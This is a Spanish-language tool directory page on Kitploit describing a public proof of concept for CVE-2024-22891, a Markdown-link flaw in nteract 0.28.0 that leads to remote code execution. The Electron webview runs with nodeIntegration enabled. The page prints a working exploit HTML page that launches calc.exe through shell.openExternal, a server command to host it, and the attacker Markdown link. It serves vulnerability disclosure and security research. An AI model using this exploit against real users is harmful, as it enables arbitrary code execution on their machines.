Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-22891 — nteract 0.28.0 explotación de redirección abierta a RCE | Kitploit
Herramientas/GitHubGitHub/eqstlab/cve-2024-22891
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubeqstlab/cve-2024-22891

CVE-2024-22891

nteract 0.28.0 explotación de redirección abierta a RCE

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC de Nteract

Una prueba de concepto para la vulnerabilidad CVE-2024-22891.

nteract 0.28.0 permite webview de Electron a través de enlace Markdown, con la consiguiente ejecución remota de código.

En este repositorio hay un ejemplo de aplicación vulnerable y un exploit de prueba de concepto (PoC) de la misma. Como PoC, hay un archivo Python que automatiza el proceso.

1. Resumen de la vulnerabilidad:

  • Asunto de la vulnerabilidad: RCE mediante enlace Markdown
  • Tipo de vulnerabilidad: Otro: Redirección abierta
  • Manifestación del problema: Webview de Electron
  • Componente afectado: markdown
  • Tipo de ataque: Ejecución remota de código
  • Vectores de ataque: Para explotar la vulnerabilidad, alguien debe hacer clic en el enlace o acceder al enlace del proyecto compartido.
  • Número CVE reservado: CVE-2024-22891

2. Causa de la vulnerabilidad:

  • nteract 0.28.0 permite webview de Electron a través de enlace Markdown, con la consiguiente ejecución remota de código (porque nodeIntegration en webPreferences es verdadero).

  • Explicación del exploit

    • Al generar enlaces a través de MarkDown dentro de la aplicación, se crea un WebView mediante Electron, permitiendo el acceso externo al enlace. En consecuencia, un atacante puede lograr la ejecución remota de código (RCE) conectándose al enlace que lleva al servidor del atacante.

Prueba de concepto (PoC)

Paso 1) El atacante crea un servidor con el código fuente para iniciar calc.exe usando la función openExternal().

root@kitploit:~
<html>
<head>
    <title>jruru Link</title>
</head>
<body>
    <a id="jruruLink">jruru Link</a>

    <script>
         // Script function definition
        function openExternal() {
            try {
                const { shell } = require('electron');
                shell.openExternal('file:C:/Windows/System32/calc.exe');
            } catch(e) {
                alert('JRURU - External link cannot be opened.');
                console.error(e);
            }
        }
        // Automatically execute openExternal function after the page is loaded
        document.addEventListener('DOMContentLoaded', function() {
            openExternal();
        });
    </script>
</body>
</html>

Nota: ※ Si quieres probarlo rápidamente, crea un servidor en el PC del atacante con el siguiente código.

root@kitploit:~
$ python -m http.server 80

Paso 2) Ejecuta la aplicación nteract en el sistema de la víctima y crea un enlace Markdown, o comparte el archivo ipynb del atacante como código de ejemplo. Luego, ejecuta calc.exe.

root@kitploit:~
[Read This] (http://[attcker_adress]/shard_data.html)

neteract nteract2


3. Información adicional

Al ejecutar un archivo .ipynb mediante uso compartido de archivos, tenga cuidado, ya que el enlace puede no ser visible.Este calc.exe podría haber sido cualquier carga maliciosa local o remota que podría haber dado al atacante acceso completo al sistema de la víctima.

Descargar herramienta